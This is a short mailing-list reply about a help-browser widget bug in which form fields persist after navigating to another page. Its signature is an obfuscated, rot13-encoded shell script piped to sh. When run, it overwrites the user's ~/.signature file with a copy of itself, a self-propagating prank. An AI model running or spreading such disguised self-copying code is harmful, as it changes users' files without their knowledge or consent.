Re: help browser/gtkxmhtml widget problem

I have made amother funny observation with the help-browser (from 0.13): 
If I display a web-page with a form with an input field and some buttons
and then go to another page, the input field and the buttons stay where
they were. Looks funny and isn't especially useful.

#!/bin/sh -
set - `type $0` 'tr "[a-m][n-z][A-M][N-Z]" "[n-z][a-m][N-Z][A-M]"';while [ \
"$2" != "" ];do shift;done;echo 'frq -a -rc '`echo "$0"| $1 `'>$UBZR/.`rpub \
signature|'`echo $1|$1`'`;rpub "Jr ner fvtangher bs Obet."'|$1|sh

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